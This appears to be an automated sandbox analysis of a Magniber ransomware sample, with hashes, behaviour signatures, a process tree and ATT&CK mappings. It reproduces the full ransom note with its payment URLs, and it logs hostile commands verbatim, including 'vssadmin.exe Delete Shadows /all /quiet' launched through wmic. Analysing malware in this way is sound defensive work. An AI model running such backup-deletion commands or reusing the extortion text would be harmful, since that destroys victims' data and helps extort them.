Analysis

  • max time kernel
    135s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    24-09-2021 10:27

General

  • Target

    463b34821a8eb219ff5980787d95bc2cfdd2d7f82720163394973814cd5dfe40.exe

  • Size

    125KB

  • MD5

    f9bf85cfb68d9e5f68bbccaf683af15c

  • SHA1

    a2eae8c1350fcfa429d2af664d8320edbfabe5d3

  • SHA256

    463b34821a8eb219ff5980787d95bc2cfdd2d7f82720163394973814cd5dfe40

  • SHA512

    07032679f19bba5690b59a6b689859d0b3611995cca6f990d2eee4b2f586493b29e70b4525e057abefe79a86695fa934f52e175a12098e0eeef7c1e3d049066a

Score
10/10

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!
====================================================================================================
Your files are NOT damaged! Your files are modified only. This modification is reversible.
The only 1 way to decrypt your files is to receive the private key and decryption program.
Any attempts to restore your files with the third party software will be fatal for your files!
====================================================================================================
To receive the private key and decryption program follow the instructions below:
1. Download "Tor Browser" from https://www.torproject.org/ and install it.
2. In the "Tor Browser" open your personal page here:
http://f26c5ab89af4da80faqwfekni.n5fnrf4l7bdjhelx.onion/qwfekni
Note! This page is available via "Tor Browser" only.
====================================================================================================
Also you can use temporary addresses on your personal page without using "Tor Browser":
http://f26c5ab89af4da80faqwfekni.perages.cyou/qwfekni
http://f26c5ab89af4da80faqwfekni.aimdrop.fit/qwfekni
http://f26c5ab89af4da80faqwfekni.soblack.xyz/qwfekni
http://f26c5ab89af4da80faqwfekni.sixsees.club/qwfekni
Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://f26c5ab89af4da80faqwfekni.n5fnrf4l7bdjhelx.onion/qwfekni

http://f26c5ab89af4da80faqwfekni.perages.cyou/qwfekni

http://f26c5ab89af4da80faqwfekni.aimdrop.fit/qwfekni

http://f26c5ab89af4da80faqwfekni.soblack.xyz/qwfekni

http://f26c5ab89af4da80faqwfekni.sixsees.club/qwfekni

Signatures

  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

  • Process spawned unexpected child process 10 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies extensions of user files 14 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 5 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
  • Modifies registry class 11 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 8 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    1⤵
    • Modifies extensions of user files
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1344
    • C:\Windows\system32\notepad.exe
      notepad.exe C:\Users\Public\readme.txt
      2⤵
      • Opens file in notepad (likely ransom note)
      PID:1740
    • C:\Windows\system32\cmd.exe
      cmd /c "start http://f26c5ab89af4da80faqwfekni.perages.cyou/qwfekni^&1^&46782124^&88^&339^&12"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1460
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" http://f26c5ab89af4da80faqwfekni.perages.cyou/qwfekni&1&46782124&88&339&12
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        PID:956
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:956 CREDAT:275457 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:1896
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1896
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1912
  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies registry class
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    PID:1400
    • C:\Users\Admin\AppData\Local\Temp\463b34821a8eb219ff5980787d95bc2cfdd2d7f82720163394973814cd5dfe40.exe
      "C:\Users\Admin\AppData\Local\Temp\463b34821a8eb219ff5980787d95bc2cfdd2d7f82720163394973814cd5dfe40.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:832
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1696
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          4⤵
          PID:1720
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1612
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          4⤵
          PID:1620
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1496
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1908
  • C:\Windows\system32\taskhost.exe
    "taskhost.exe"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1260
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1676
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:976
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1516
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1600
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:1068
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1780
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      PID:1212
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:1316
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:2040
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1920
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:1596
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1172
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      PID:1464
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:1544
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:2016
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:752
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:1760
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:1612
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:1080
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:1692
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:2044
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:1908
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    PID:1516

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

  • File Deletion 2 T1107
  • Modify Registry 1 T1112

Discovery

  • System Information Discovery 1 T1082

Impact

  • Inhibit System Recovery 2 T1490


Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\SOVCWR0E.txt
  • C:\Users\Admin\Desktop\AddShow.nfo.qwfekni
  • C:\Users\Admin\Desktop\ApprovePing.docm.qwfekni
  • C:\Users\Admin\Desktop\BackupUpdate.dib.qwfekni
  • C:\Users\Admin\Desktop\BlockBackup.bmp.qwfekni
  • C:\Users\Admin\Desktop\CloseUnregister.xlsx.qwfekni
  • C:\Users\Admin\Desktop\CopyDisable.odt.qwfekni
  • C:\Users\Admin\Desktop\DismountTest.mpg.qwfekni
  • C:\Users\Admin\Desktop\EditMove.avi.qwfekni
  • C:\Users\Admin\Desktop\EnterBackup.tif.qwfekni
  • C:\Users\Admin\Desktop\ExitUnregister.png.qwfekni
  • C:\Users\Admin\Desktop\GetWait.pps.qwfekni
  • C:\Users\Admin\Desktop\NewDisconnect.emf.qwfekni
  • C:\Users\Admin\Desktop\RestoreStart.odt.qwfekni
  • C:\Users\Admin\Desktop\StopSet.bmp.qwfekni
  • C:\Users\Admin\Desktop\UninstallReset.ppsx.qwfekni
  • C:\Users\Admin\Desktop\UnpublishApprove.potx.qwfekni
  • C:\Users\Admin\Desktop\readme.txt
  • C:\Users\Public\readme.txt
